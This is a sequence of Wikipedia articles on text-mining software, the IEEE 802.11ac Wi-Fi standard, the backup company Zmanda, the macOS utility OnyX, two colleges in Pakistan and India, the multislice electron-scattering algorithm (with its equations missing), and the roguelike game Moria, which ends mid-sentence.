analysis with structured data to provide additional predictive variables for improved predictive models and association analysis. Linguamatics – provider of natural language processing (NLP) based enterprise text mining and text analytics software, I2E, for high-value knowledge discovery and decision support. Mathematica – provides built-in tools for text alignment, pattern matching, clustering and semantic analysis. See Wolfram Language, the programming language of Mathematica. MATLAB – offers the Text Analytics Toolbox for importing text data, converting it to numeric form for use in machine and deep learning, sentiment analysis and classification tasks. Medallia – offers one system of record for survey, social, text, written and online feedback. NetOwl – suite of multilingual text and entity analytics products, including entity extraction, link and event extraction, sentiment analysis, geotagging, name translation, name matching, and identity resolution, among others. PolyAnalyst – text analytics environment. RapidMiner with its Text Processing Extension – data and text mining software. SAS – SAS Text Miner and Teragram; commercial text analytics, natural language processing, and taxonomy software used for Information Management. Sketch Engine – corpus manager and analysis software that supports building text corpora from uploaded texts or from the Web (including from a particular website), with part-of-speech tagging and lemmatization. Sysomos – provider of a social media analytics software platform, including text analytics and sentiment analysis on online consumer conversations. 
WordStat – Content analysis and text mining add-on module of QDA Miner for analyzing large amounts of text data. Open source Carrot2 – text and search results clustering framework. GATE – General Architecture for Text Engineering, an open-source toolbox for natural language processing and language engineering. Gensim – large-scale topic modelling and extraction of semantic information from unstructured text (Python). Natural Language Toolkit (NLTK) – a suite of libraries and programs for symbolic and statistical natural language processing (NLP) for the Python programming language. OpenNLP – natural language processing. Orange with its text mining add-on. Stanbol – an open source text mining engine targeted at semantic content management. The programming language R provides a framework for text mining applications in the package tm. The Natural Language Processing task view contains tm and other text mining library packages. The KNIME Text Processing extension. The PLOS Text Mining Collection. Voyant Tools – a web-based text analysis environment, created as a scholarly project. spaCy – open-source natural language processing library for Python. KH Coder – for quantitative content analysis or text mining. References External links Text Mining APIs on Mashape Text Mining APIs on Programmable Web Text Mining APIs at the Text Analysis Portal for Research Data mining and machine learning software Lists of software
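As a minimal sketch of the kind of workflow these open-source toolkits support, the following uses NLTK (listed above) to tokenize a short invented text, drop English stop words, and count term frequencies. It assumes NLTK is installed and that its tokenizer and stop-word corpora can be downloaded in the environment.

```python
# Minimal text-mining sketch with NLTK (assumes `pip install nltk`).
import nltk
from nltk.corpus import stopwords
from nltk.probability import FreqDist

# One-time downloads of the tokenizer model and the stop-word list.
nltk.download("punkt", quiet=True)
nltk.download("stopwords", quiet=True)

text = ("Text mining turns unstructured text into structured features. "
        "Text mining tools tokenize, tag, and count terms.")

# Tokenize, keep alphabetic tokens, lower-case them, and drop stop words.
tokens = [t.lower() for t in nltk.word_tokenize(text) if t.isalpha()]
tokens = [t for t in tokens if t not in stopwords.words("english")]

# Term-frequency summary of the remaining vocabulary.
print(FreqDist(tokens).most_common(5))  # e.g. [('text', 3), ('mining', 2), ...]
```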
30802525
https://en.wikipedia.org/wiki/IEEE%20802.11ac-2013
IEEE 802.11ac-2013
IEEE 802.11ac-2013 or 802.11ac is a wireless networking standard in the IEEE 802.11 set of protocols (which is part of the Wi-Fi networking family), providing high-throughput wireless local area networks (WLANs) on the 5 GHz band. The standard has been retroactively labelled as Wi-Fi 5 by the Wi-Fi Alliance. The specification has multi-station throughput of at least 1 gigabit per second (1 Gbit/s) and single-link throughput of at least 500 megabits per second (500 Mbit/s). This is accomplished by extending the air-interface concepts embraced by 802.11n: wider RF bandwidth (up to 160 MHz), more MIMO spatial streams (up to eight), downlink multi-user MIMO (up to four clients), and high-density modulation (up to 256-QAM). The Wi-Fi Alliance separated the introduction of ac wireless products into two phases ("waves"), named "Wave 1" and "Wave 2". From mid-2013, the alliance started certifying Wave 1 802.11ac products shipped by manufacturers, based on the IEEE 802.11ac Draft 3.0 (the IEEE standard was not finalized until later that year). Subsequently, in 2016, the Wi-Fi Alliance introduced the Wave 2 certification, which includes additional features like MU-MIMO (down-link only), 160 MHz channel width support, support for more 5 GHz channels, and four spatial streams (with four antennas; compared to three in Wave 1 and 802.11n, and eight in the IEEE 802.11ac specification). This meant Wave 2 products would have higher bandwidth and capacity than Wave 1 products.
New technologies
New technologies introduced with 802.11ac include the following:
Extended channel bonding: optional 160 MHz and mandatory 80 MHz channel bandwidth for stations; cf. 40 MHz maximum in 802.11n.
More MIMO spatial streams: support for up to eight spatial streams (vs. four in 802.11n).
Downlink multi-user MIMO (MU-MIMO, allows up to four simultaneous downlink MU-MIMO clients): multiple STAs, each with one or more antennas, transmit or receive independent data streams simultaneously. Space-division multiple access (SDMA): streams are not separated by frequency, but instead resolved spatially, analogous to 11n-style MIMO. Downlink MU-MIMO (one transmitting device, multiple receiving devices) is included as an optional mode.
Modulation: 256-QAM, rate 3/4 and 5/6, added as optional modes (vs. 64-QAM, rate 5/6 maximum in 802.11n). Some vendors offer a non-standard 1024-QAM mode, providing a 25% higher data rate compared to 256-QAM.
Other elements/features: beamforming with standardized sounding and feedback for compatibility between vendors (non-standard beamforming implementations in 802.11n made it hard for beamforming to work effectively between different vendors' products); MAC modifications (mostly to support the above changes); coexistence mechanisms for 20, 40, 80, and 160 MHz channels, 11ac and 11a/n devices; and four new fields added to the PPDU header identifying the frame as a very high throughput (VHT) frame as opposed to 802.11n's high throughput (HT) or earlier.
The first three fields in the header are readable by legacy devices to allow coexistence.
Features
Mandatory
Borrowed from the 802.11a/802.11g specifications:
800 ns regular guard interval
Binary convolutional coding (BCC)
Single spatial stream
Newly introduced by the 802.11ac specification:
80 MHz channel bandwidths
Optional
Borrowed from the 802.11n specification:
Two to four spatial streams
Low-density parity-check code (LDPC)
Space–time block coding (STBC)
Transmit beamforming (TxBF)
400 ns short guard interval (SGI)
Newly introduced by the 802.11ac specification:
Five to eight spatial streams
160 MHz channel bandwidths (contiguous 80+80)
80+80 MHz channel bonding (discontiguous 80+80)
MCS 8/9 (256-QAM)
New scenarios and configurations
The single-link and multi-station enhancements supported by 802.11ac enable several new WLAN usage scenarios, such as simultaneous streaming of HD video to multiple clients throughout the home, rapid synchronization and backup of large data files, wireless display, large campus/auditorium deployments, and manufacturing floor automation. With the inclusion of a USB 3.0 interface, 802.11ac access points and routers can use locally attached storage to provide various services that fully utilize their WLAN capacities, such as video streaming, FTP servers, and personal cloud services. With storage locally attached through USB 2.0, filling the bandwidth made available by 802.11ac was not easily accomplished.
Example configurations
All rates assume 256-QAM, rate 5/6.
Wave 1 vs. Wave 2
Wave 2, referring to products introduced in 2016, offers higher throughput than legacy Wave 1 products, those introduced starting in 2013. The maximum physical-layer theoretical rate for Wave 1 is 1.3 Gbit/s, while Wave 2 can reach 2.34 Gbit/s. Wave 2 can therefore achieve 1 Gbit/s even if the real-world throughput turns out to be only 50% of the theoretical rate. Wave 2 also supports a higher number of connected devices.
Data rates and speed
Several companies are currently offering 802.11ac chipsets with higher modulation rates: MCS-10 and MCS-11 (1024-QAM), supported by Quantenna and Broadcom. Although technically not part of 802.11ac, these new MCS indices are expected to become official in the 802.11ax standard (~2019), the successor to 802.11ac. 160 MHz channels, and thus the highest throughput rates, might be unusable in some countries/regions due to regulatory issues that have allocated some of those frequencies for other purposes.
Advertised speeds
802.11ac-class device wireless speeds are often advertised as "AC" followed by a number, that number being the sum of the highest link rates in Mbit/s of all the simultaneously usable radios in the device. For example, an AC1900 access point might have 600 Mbit/s capability on its 2.4 GHz radio and 1300 Mbit/s capability on its 5 GHz radio. No single client device could connect and achieve 1900 Mbit/s of throughput, but separate devices each connecting to the 2.4 GHz and 5 GHz radios could achieve combined throughput approaching 1900 Mbit/s. Different possible stream configurations can add up to the same AC number (a short worked sketch of this arithmetic appears at the end of this article).
Products
Commercial routers and access points
Quantenna released the first 802.11ac chipset for retail Wi-Fi routers and consumer electronics on November 15, 2011. Redpine Signals released the first low-power 802.11ac technology for smartphone application processors on December 14, 2011. On January 5, 2012, Broadcom announced its first 802.11ac Wi-Fi chips and partners, and on April 27, 2012, Netgear announced the first Broadcom-enabled router.
On May 14, 2012, Buffalo Technology released the world’s first 802.11ac products to market, releasing a wireless router and client bridge adapter. On December 6, 2012, Huawei announced commercial availability of the industry's first enterprise-level 802.11ac Access Point. Motorola Solutions is selling 802.11ac access points, including the AP 8232. In April 2014, Hewlett-Packard started selling the HP 560 access point in the controller-based WLAN enterprise market segment.
Commercial laptops
On June 7, 2012, it was reported that Asus had unveiled its ROG G75VX gaming notebook, which would be the first consumer-oriented notebook to be fully compliant with 802.11ac (albeit in its "draft 2.0" version). Apple began implementing 802.11ac starting with the MacBook Air in June 2013, followed by the MacBook Pro and Mac Pro later that year. Hewlett-Packard incorporates 802.11ac compliance in laptop computers.
Commercial handsets (partial list)
Commercial tablets
Chipsets
See also
IEEE 802.11ad
Notes
References
External links
802.11ac Technology Introduction white paper
MIMO 802.11ac Test Architectures
802.11ac: The Fifth Generation of Wi-Fi Technical Paper
802.11ac primer
Intel Wireless Products Selection Guide
ac-2013
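To make the arithmetic in the Data rates and Advertised speeds sections above concrete, here is a minimal sketch of the standard 802.11ac PHY-rate calculation (data subcarriers × bits per subcarrier × coding rate × spatial streams ÷ symbol duration) and of how per-radio rates add up to an "AC" marketing number. The subcarrier counts and symbol durations are the commonly quoted 802.11ac OFDM values; the function and constant names are illustrative and do not come from any standard document or vendor SDK.

```python
# Sketch of 802.11ac PHY-rate arithmetic (illustrative, not a vendor tool).

DATA_SUBCARRIERS = {20: 52, 40: 108, 80: 234, 160: 468}  # per channel width in MHz

def phy_rate_mbps(width_mhz, bits_per_subcarrier, coding_rate, streams, short_gi=True):
    """Peak PHY rate in Mbit/s for a single radio."""
    symbol_us = 3.6 if short_gi else 4.0  # 3.2 us symbol plus 0.4 or 0.8 us guard interval
    bits_per_symbol = DATA_SUBCARRIERS[width_mhz] * bits_per_subcarrier * coding_rate * streams
    return bits_per_symbol / symbol_us  # bits per microsecond equals Mbit/s

# Wave 1 style 5 GHz radio: 80 MHz, 3 streams, 256-QAM (8 bits), rate 5/6, short GI.
five_ghz = phy_rate_mbps(80, 8, 5 / 6, 3)            # 1300.0 Mbit/s
# Non-standard 1024-QAM (10 bits) gives the 25% gain mentioned above: 1625.0 Mbit/s.
five_ghz_1024qam = phy_rate_mbps(80, 10, 5 / 6, 3)
# An "AC1900" router advertises this 1300 plus the 600 Mbit/s of its 2.4 GHz radio.
print(five_ghz, five_ghz_1024qam, round(five_ghz) + 600)
```

As the Wave 1 vs. Wave 2 section notes, real-world throughput is substantially lower than these peak PHY rates.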
25304329
https://en.wikipedia.org/wiki/Zmanda
Zmanda
Zmanda Inc. is an open-source software and cloud backup company. It is headquartered in the United States. In partnership with open source companies such as Sun and MySQL, the company contributed to open source projects. Zmanda was acquired by Betsol in May 2018.
History
Zmanda was founded in May 2005 in Sunnyvale, California. It disclosed a round of $2 million of funding in October 2005, with investor Chander Kant, who was also an executive at the time. Pete Childers became chief executive in May 2007 and resigned in July of that year, with Kant then becoming chief executive. Zmanda develops and maintains the open source backup tools Advanced Maryland Automatic Network Disk Archiver (Amanda) and the Zmanda Recovery Manager (ZRM) for MySQL, an open source relational database management system. ZRM included a graphical user interface for installation and management. ZRM is written in the Perl programming language and released under the GNU General Public License. Source code is kept on GitHub. The company was named one of MySQL's partners of the year in 2008. Within two weeks of the announcement that Sun Microsystems would acquire MySQL AB (the company that developed MySQL), Sun announced a partnership to sell ZRM. A backup agent allowed integration with the NetBackup product from Symantec. Version 3.0 of ZRM was released in 2009, including support for the Ubuntu distribution of the Linux operating system. In early 2009, the company announced a remote backup service for cloud computing. Zmanda developed the open source ZCloud API, announced in 2009, to enable backup software vendors to integrate software with public and private storage clouds. Like many open source firms, Zmanda generated revenue by selling products built on the open source codebase as well as by providing services and support to the customers who buy these products. Zmanda offers an annual subscription fee model similar to those of Red Hat and MySQL. In 2010, Zmanda announced an option to support IBM Tivoli Storage Manager in ZRM. After Sun was acquired by Oracle Corporation in 2010, Oracle continued to promote ZRM. Zmanda was acquired by Carbonite, Inc. in 2012, and then by Betsol in May 2018. Betsol, headed by Ashok Reddy, had also acquired the backup software Rebit from Carbonite in 2017. When the 4.0 version was announced in 2020, the location given was Broomfield, Colorado, where Betsol is located. Betsol continues to call the software Zmanda, and released version 4.1 in September 2021, which added support for the Microsoft Azure cloud.
See also
List of online backup services
References
External links
Official site
Free data recovery software
Free backup software
Companies based in Sunnyvale, California
7734968
https://en.wikipedia.org/wiki/List%20of%20trademarked%20open-source%20software
List of trademarked open-source software
This is a list of free/open-source software whose names are covered by registered trademarks. As many countries provide some form of basic protection for unregistered (common law) trademarks, nearly any free or open-source software title may be trademarked under common law. This list covers software whose trademarks are registered under a country's intellectual property body. References Free software lists and comparisons Open source software
15336081
https://en.wikipedia.org/wiki/OnyX
OnyX
OnyX is a popular freeware utility for macOS developed by French developer Joël Barrière that is compatible with both Intel processors and Apple silicon (previous versions supported PowerPC). As a multifunctional tool for maintenance and optimization, it can control many basic Unix programs already built into macOS, including setting hidden preferences otherwise modified by using property list editors and the command line. Features Verify the structure of the file system on the start-up volume Repair disk permissions Configure certain parameters hidden from the system and from certain applications Empty System, User, Internet, Font caches Force Empty the Trash Rebuild Launch Services, CoreDuet database, XPC Cache... Rebuild Spotlight and Mail indexes Development Created in 2003 by Joël Barrière, a.k.a. Titanium, the program was originally meant to address its creator's personal needs. Developed using Xcode, Apple's software development environment (Cocoa + AppleScript Studio + Objective-C), OnyX is regularly updated by its author taking into consideration users' suggestions and requests. To do its job, the program uses macOS's standard Unix utilities, allowing their control through a graphical user interface without needing the command line. Versions OnyX versions are specific to each version of macOS and are not backward compatible. The program will not work correctly if used with an OS for which it was not designed. Mac OS X 10.2 Jaguar: OnyX version 1.3.1 Mac OS X 10.3 Panther: OnyX version 1.5.3 Mac OS X 10.4 Tiger: OnyX version 1.8.6 Mac OS X 10.5 Leopard: OnyX version 2.0.6 Mac OS X 10.6 Snow Leopard: OnyX version 2.4.0 Mac OS X 10.7 Lion: OnyX version 2.4.8 OS X 10.8 Mountain Lion: OnyX version 2.7.4 OS X 10.9 Mavericks: OnyX version 2.8.9 OS X 10.10 Yosemite: OnyX version 3.0.2 OS X 10.11 El Capitan: OnyX version 3.1.9 macOS 10.12 Sierra: OnyX version 3.3.1 macOS 10.13 High Sierra: OnyX version 3.4.9 macOS 10.14 Mojave: OnyX version 3.6.8 macOS 10.15 Catalina: OnyX version 3.8.3 macOS 11 Big Sur: OnyX version 3.9.5 macOS 12 Monterey: OnyX version 4.1.0 The build for macOS Monterey is actively maintained. However, all previous versions in support of past operating systems are still available for download from the developer's website. References External links Official Site in English Official Site in French Utilities for macOS
30864570
https://en.wikipedia.org/wiki/Institute%20of%20Management%20Sciences%20%28Lahore%29
Institute of Management Sciences (Lahore)
The Institute of Management Sciences (IMS Lahore), formerly known as the Pak-American Institute of Management Sciences (Pak-AIMS), is a project of AKEF (Al Karim Educational Foundation) established in Lahore, Pakistan, in 1987, which offers undergraduate and graduate programs in management and computer sciences. As of 2014, the Rector of the institute is Khalid Ranjha. It is located in Gulberg, Lahore. Pak-AIMS was issued a No Objection Certificate (NOC) by the University Grants Commission, now known as the Higher Education Commission (Pakistan), for the award of a charter in 1995. Consequently, the institute was chartered as the Institute of Management Sciences (IMS) by the Government of Punjab (Pakistan) under the Punjab Ordinance XXIII of 2002 and given degree-awarding status.
Government-recognized institution
The Institute of Management Sciences has 1,400 students at two campuses and 110 faculty members, who teach 170 courses in trimesters. The institute is officially accredited and recognized by the Higher Education Commission of Pakistan.
Introduction and history
The institute was established in Lahore in 1986 as the Canadian School of Management - Lahore Learning Center. Later the name was changed to The Pak-American Institute of Management Sciences (Pak-AIMS) to reflect the institute's Articulation Agreement with the College of Staten Island of City University of New York (CSI/CUNY), USA.
Campuses
Main campus, Gulberg III, Lahore, Pakistan.
Departments
Department of Computer Science
Department of Management Sciences
Department of Law
Department of Physics
Department of English Literature
Department of Mathematics
Bachelor's degrees offered
Bachelor's in Computer Sciences
Bachelor of Business Administration
Bachelor of Information Technology
Bachelor's in Computer Engineering
Bachelor's in Software Engineering
Master's degrees offered
Master of Business Administration
Master's in Computer Sciences
Master of Business Administration (Executive)
Master's in History
Notable faculty
Khalid Ranjha
References
External links
Pak-AIMS website
Location on map
Higher Education Commission of Pakistan recognized universities list in Pakistan
Educational institutions established in 1987
Universities and colleges in Lahore
Business schools in Pakistan
1987 establishments in Pakistan
22157068
https://en.wikipedia.org/wiki/Multislice
Multislice
The multislice algorithm is a method for the simulation of the elastic interaction of an electron beam with matter, including all multiple scattering effects. The method is reviewed in the book by Cowley. The algorithm is used in the simulation of high-resolution transmission electron microscopy micrographs, and serves as a useful tool for analyzing experimental images. Here we describe relevant background information, the theoretical basis of the technique, the approximations used, and several software packages that implement this technique. Moreover, we delineate some of the advantages and limitations of the technique and important considerations that need to be taken into account for real-world use.
Background
The multislice method has found wide application in electron crystallography. The mapping from a crystal structure to its image or diffraction pattern has been relatively well understood and documented. However, the reverse mapping from electron micrograph images to the crystal structure is generally more complicated. The fact that the images are two-dimensional projections of a three-dimensional crystal structure makes it tedious to compare these projections to all plausible crystal structures. Hence, the use of numerical techniques for simulating results for different crystal structures is integral to the field of electron microscopy and crystallography. Several software packages exist to simulate electron micrographs. There are two widely used simulation techniques in the literature: the Bloch wave method, derived from Hans Bethe's original theoretical treatment of the Davisson-Germer experiment, and the multislice method. Here, we primarily focus on the multislice method for the simulation of diffraction patterns, including multiple elastic scattering effects. Most of the packages that exist implement the multislice algorithm along with Fourier analysis to incorporate electron lens aberration effects, to determine the electron microscope image, and to address aspects such as phase contrast and diffraction contrast. For electron microscope samples in the form of a thin crystalline slab in the transmission geometry, the aim of these software packages is to provide a map of the crystal potential; however, this inversion process is greatly complicated by the presence of multiple elastic scattering. The first description of what is now known as the multislice theory was given in the classic paper by Cowley and Moodie. In this work, the authors describe the scattering of electrons using a physical optics approach without invoking quantum mechanical arguments. Many other derivations of these iterative equations have since been given using alternative methods, such as Green's functions, differential equations, scattering matrices or path integral methods. A summary of the development of a computer algorithm from the multislice theory of Cowley and Moodie for numerical computation was reported by Goodman and Moodie. They also discussed in detail the relationship of the multislice to the other formulations. Specifically, using Zassenhaus's theorem, this paper gives the mathematical path from the multislice to: (1) the Schrödinger equation (derived from the multislice); (2) Darwin's differential equations, widely used for diffraction-contrast TEM image simulations, i.e. the Howie-Whelan equations derived from the multislice; (3) Sturkey's scattering matrix method; (4) the free-space propagation case; (5) the phase grating approximation; (6)
A new "thick-phase grating" approximation, which has never been used, 7. Moodie's polynomial expression for multiple scattering, 8. The Feynman path-integral formulation, and 9. relationship of multislice to the Born series. The relationship between algorithms is summarized in Section 5.11 of Spence (2013), (see Figure 5.9). Theory The form of multislice algorithm presented here has been adapted from Peng, Dudarev and Whelan 2003. The multislice algorithm is an approach to solving the Schrödinger wave equation: In 1957, Cowley and Moodie showed that the Schrödinger equation can be solved analytically to evaluate the amplitudes of diffracted beams. Subsequently, the effects of dynamical diffraction can be calculated and the resulting simulated image will exhibit good similarities with the actual image taken from a microscope under dynamical conditions. Furthermore, the multislice algorithm does not make any assumption about the periodicity of the structure and can thus be used to simulate HREM images of aperiodic systems as well. The following section will include a mathematical formulation of the Multislice algorithm. The Schrödinger equation can also be represented in the form of incident and scattered wave as: where is the Green's function that represents the amplitude of the electron wave function at a point due to a source at point . Hence for an incident plane wave of the form the Schrödinger equation can be written as We then choose the coordinate axis in such a way that the incident beam hits the sample at (0,0,0) in the -direction, i.e., . Now we consider a wave-function with a modulation function for the amplitude. Equation () becomes then an equation for the modulation function, i.e., . Now we make substitutions with regards to the coordinate system we have adhered, i.e., and thus , where is the wavelength of the electrons with energy and is the interaction constant. So far we have set up the mathematical formulation of wave mechanics without addressing the scattering in the material. Further we need to address the transverse spread, which is done in terms of the Fresnel propagation function . The thickness of each slice over which the iteration is performed is usually small and as a result within a slice the potential field can be approximated to be constant . Subsequently, the modulation function can be represented as: We can therefore represent the modulation function in the next slice where, * represents convolution, and defines the transmission function of the slice. Hence, the iterative application of the aforementioned procedure will provide a full interpretation of the sample in context. Further, it should be reiterated that no assumptions have been made on the periodicity of the sample apart from assuming that the potential is uniform within the slice. As a result, it is evident that this method in principle will work for any system. However, for aperiodic systems in which the potential will vary rapidly along the beam direction, the slice thickness has to be significantly small and hence will result in higher computational expense. Practical Considerations The basic premise is to calculate diffraction from each layer of atoms using Fast Fourier Transforms (FFT) and multiplying each by a phase grating term. The wave is then multiplied by a propagator, inverse Fourier Transformed, multiplied by a phase grating term yet again, and the process is repeated. 
The use of FFTs allows a significant computational advantage over the Bloch wave method in particular, since the FFT algorithm involves O(N log N) steps, compared to the diagonalization problem of the Bloch wave solution, which scales as O(N³), where N is the number of atoms in the system. (See Table 1 for a comparison of computational times.) The most important step in performing a multislice calculation is setting up the unit cell and determining an appropriate slice thickness. In general, the unit cell used for simulating images will be different from the unit cell that defines the crystal structure of a particular material. The primary reason for this is aliasing effects, which occur due to wraparound errors in FFT calculations. The requirement to add additional “padding” to the unit cell has earned it the nomenclature “super cell”, and the requirement to add these additional pixels to the basic unit cell comes at a computational price. To illustrate the effect of choosing a slice thickness that is too thin, consider a simple example. The Fresnel propagator describes the propagation of electron waves in the z direction (the direction of the incident beam) in a solid; here k is the reciprocal lattice coordinate, z is the depth in the sample, and λ is the wavelength of the electron wave (related to the magnitude of the wave vector k₀ by k₀ = 2π/λ). Figure [fig:SliceThickness] shows a vector diagram of the wave-fronts being diffracted by the atomic planes in the sample. In the case of the small-angle approximation (scattering angles below about 100 mrad) the phase shift can be approximated by its lowest-order expansion; at 100 mrad the error of this approximation is on the order of 0.5%. For small angles this approximation holds regardless of how many slices there are, although choosing a slice thickness greater than the lattice parameter (or half the lattice parameter in the case of perovskites) for a multislice simulation would result in missing atoms that should be in the crystal potential. Additional practical concerns are how to effectively include effects such as inelastic and diffuse scattering, quantized excitations (e.g. plasmons, phonons, excitons), etc. There was one code that took these things into consideration through a coherence function approach, called Yet Another Multislice (YAMS), but the code is no longer available either for download or purchase.
Available Software
There are several software packages available to perform multislice simulations of images. Among these are NCEMSS, NUMIS, MacTempas, and Kirkland's ACEM. Other programs exist, but unfortunately many have not been maintained (e.g. SHRLI81 by Mike O’Keefe of Lawrence Berkeley National Lab and Cerius2 of Accelrys). A brief chronology of multislice codes is given in Table 2, although this is by no means exhaustive.
ACEM/JCSTEM
This software is developed by Professor Earl Kirkland of Cornell University. This code is freely available as an interactive Java applet and as standalone code written in C/C++. The Java applet is ideal for a quick introduction and for simulations under a basic incoherent linear imaging approximation. The ACEM code accompanies an excellent text of the same name by Kirkland, which describes the background theory and computational techniques for simulating electron micrographs (including multislice) in detail. The main C/C++ routines use a command-line interface (CLI) for automated batching of many simulations. The ACEM package also includes a graphical user interface that is more appropriate for beginners.
The atomic scattering factors in ACEM are accurately characterized by a 12-parameter fit of Gaussians and Lorentzians to relativistic Hartree–Fock calculations.
NCEMSS
This package was released by the National Center for High Resolution Electron Microscopy. The program uses a mouse-driven graphical user interface and was written by Dr. Roar Kilaas and Dr. Mike O’Keefe of Lawrence Berkeley National Laboratory. While the code is no longer developed, the program is available through the Electron Direct Methods (EDM) package written by Professor Laurence Marks of Northwestern University. Debye-Waller factors can be included as a parameter to account for diffuse scattering, although the accuracy is unclear (i.e. a good guess of the Debye-Waller factor is needed).
NUMIS
The Northwestern University Multislice and Imaging System (NUMIS) is a package written by Professor Laurence Marks of Northwestern University. It uses a command-line interface (CLI) and is based on UNIX. A structure file must be provided as input in order to use this code, which makes it ideal for advanced users. The NUMIS multislice programs use the conventional multislice algorithm, calculating the wavefunction of the electrons at the bottom of the crystal and simulating the image while taking into account various instrument-specific parameters, including the beam convergence. This program is good to use if one already has structure files for a material that have been used in other calculations (for example, density functional theory). These structure files can be used to generate X-ray structure factors, which are then used as input for the PTBV routine in NUMIS. Microscope parameters can be changed through the MICROVB routine.
MacTempas
This software is specifically developed to run on Mac OS X by Dr. Roar Kilaas of Lawrence Berkeley National Laboratory. It is designed to have a user-friendly interface and has been well maintained relative to many other codes (last update May 2013). It is available for a fee.
JMULTIS
This multislice simulation software was written in FORTRAN 77 by Dr. J. M. Zuo while he was a postdoctoral research fellow at Arizona State University under the guidance of Prof. John C. H. Spence. The source code was published in the book Electron Microdiffraction. A comparison between multislice and Bloch wave simulations for ZnTe was also published in the book. A separate comparison between several multislice algorithms was reported in 2000.
QSTEM
The Quantitative TEM/STEM (QSTEM) simulation software package was written by Professor Christopher Koch of Humboldt University of Berlin in Germany. It allows simulation of HAADF, ADF, and ABF STEM imaging, as well as conventional TEM and CBED. The executable and source code are available as a free download on the Koch group website.
STEM-CELL
This is a code written by Dr Vincenzo Grillo of the Institute for Nanoscience (CNR) in Italy. The code is essentially a graphical frontend to the multislice code written by Kirkland, with additional features. These include tools to generate complex crystalline structures, to simulate HAADF images and to model the STEM probe, as well as the modeling of strain in materials. Tools for image analysis (e.g. GPA) and filtering are also available. The code is updated quite often with new features, and a user mailing list is maintained. It is freely available on the group's website.
DR. PROBE
Multislice image simulations for high-resolution scanning and coherent imaging transmission electron microscopy, written by Dr. Juri Barthel from the Ernst Ruska-Centre at the Jülich Research Centre. The software comprises a graphical user interface version for direct visualization of STEM image calculations, as well as a bundle of command-line modules for more comprehensive calculation tasks. The programs have been written using Visual C++, Fortran 90, and Perl. Executable binaries for Microsoft Windows 32-bit and 64-bit operating systems are available for free from the website.
clTEM
OpenCL-accelerated multislice software written by Dr. Adam Dyson and Dr. Jonathan Peters from the University of Warwick. clTEM is under development as of October 2019.
cudaEM
cudaEM is a multi-GPU enabled code based on CUDA for multislice simulations, developed by the group of Prof. Stephen Pennycook.
References
Microscopy
Mathematical modeling
54637182
https://en.wikipedia.org/wiki/Vignan%27s%20Institute%20of%20Information%20Technology
Vignan's Institute of Information Technology
Vignan's Institute of Information Technology is one of the engineering institutions run by the Vignan group of Guntur. It was established in 2002 to offer undergraduate (BTech) courses (college code: L3) in engineering and technology. It is situated in Duvvada, a suburban region of Visakhapatnam, India.
Library facility
The college has a library, named Vignan Dhara, which holds volumes related to all departments of study.
References
Vignan's Institute Of Information Technology
VIIT declared autonomous, to offer new job-oriented courses
https://www.thehansindia.com/posts/index/Andhra-Pradesh/2018-09-20/Vignans-Institute-of-Information-Technology-holds-awareness-programme-on-employability/413032 Vignan's Institute of Information Technology holds awareness programme on employability
"Yuvtarang 2k17 to be held at Duvvada on January 7, 8"
Engineering colleges in Andhra Pradesh
Universities and colleges in Visakhapatnam
2002 establishments in Andhra Pradesh
Educational institutions established in 2002
161673
https://en.wikipedia.org/wiki/Moria%20%281983%20video%20game%29
Moria (1983 video game)
The Dungeons of Moria, usually referred to as just Moria, is a computer game inspired by J. R. R. Tolkien's novel The Lord of the Rings. The objective of the game is to dive deep into the Mines of Moria and kill the Balrog. Moria, along with Hack (1984) and Larn (1986), is considered to be among the earliest roguelike games, and the first to include a town level. Moria was the basis of the better-known Angband roguelike game, and influenced the preliminary design of Blizzard Entertainment's Diablo. Gameplay The player's goal is to descend to the depths of Moria to defeat the Balrog, akin to a boss battle. As with Rogue, levels are not persistent: when the player leaves a level and then tries to return, a new level is procedurally generated. Among other improvements to Rogue, there is a persistent town at the highest level where players can buy and sell equipment. Moria begins with the creation of a character. The player first chooses a "race" from the following: Human, Half-Elf, Elf, Halfling, Gnome, Dwarf, Half-Orc, or Half-Troll. Racial selection determines base statistics and class availability. One then selects the character's "class" from the following: Warrior, Mage, Priest, Rogue, Ranger, or Paladin. Class further determines statistics, as well as the abilities acquired during gameplay. Mages, Rangers, and Rogues can learn magic; Priests and Paladins can learn prayers. Warriors possess no additional abilities. The player begins the game with a limited number of items on a town level consisting of six shops: (1) a General Store, (2) an Armory, (3) a Weaponsmith, (4) a Temple, (5) an Alchemy shop, and (6) a Magic-Users store. A staircase on this level descends into a series of randomly generated underground mazes. Deeper levels contain more powerful monsters and better treasures. Each time the player ascends or descends a staircase, a new level is created and the old one discarded; only the town persists throughout the game. As in most roguelikes, it is impossible to reload from a save if the player's character dies, as the game saves its state only upon exit, preventing the save-scumming that is possible in most computer games that allow saving. The balrog (represented by the upper-case letter B) is encountered at the deepest depths of the dungeon. Once the balrog has been killed, the game is won, and no further saving of the game is possible. Player characteristics The player character has many characteristics in the game. Some characteristics, like sex, weight, and height, cannot be changed once the character has been created, while other characteristics like strength, intelligence, and armor class can be modified by using certain items in a particular way. Mana and hit points are replenished by rest or by some other magical means. Gold accrues as the player steps on gems or currency. Experience accrues as the player performs various actions in the dungeon, mostly by killing creatures. The "miscellaneous abilities" are modified as each skill is performed and as the player increases in experience. History Around 1981, while enrolled at the University of Oklahoma, Robert Alan Koeneke became hooked on playing the video game Rogue. Soon after, Koeneke moved departments to work on an early VAX-11/780 minicomputer running VMS, which at that time had no games. Since no longer having access to Rogue was "intolerable" for Koeneke, he started developing his own Rogue-style game using VMS BASIC and gave it the name Moria Beta 1.0. During the summer of 1983, Koeneke rewrote his game in VMS Pascal, releasing Moria 1.0.
In 1983/84 Jimmey Wayne Todd Jr. joined Koeneke on the development of Moria, bringing with him his character generator, and working on various aspects of the game, including the death routines. Koeneke started distributing the source code in 1985 under a license that permitted sharing and modification, but not commercial use. The last VMS version was Moria 4.8, released in November 1986. In February 1987, James E. Wilson started converting the VMS Pascal source code to the C programming language for use on UNIX systems, which had started to become popular by this date. To distinguish his release from the original VMS Moria, Wilson named it UNIX Moria, shortened to UMoria. UMoria 4.85 was released on November 5, 1987. As C was a much more portable programming language than VMS Pascal, there was an explosion of Moria ports for a variety of different computer systems such as MS-DOS, Amiga, Atari ST and Apple IIGS. UMoria 5.0, released in 1989, unified these separate ports into a single code base, fixing many bugs and gameplay balance issues, as well as adding lots of new features; many of which were taken from BRUCE Moria (1988). In 1990 the Angband project was started, which is based on the UMoria 5.2.1 source code. UMoria was in continuous development for several more years, with UMoria 5.5.2 released on July 21, 1994. During the early 2000's David Grabiner maintained the code base, releasing only minor compiler related fixes. In 2008, through the work of the free-moria 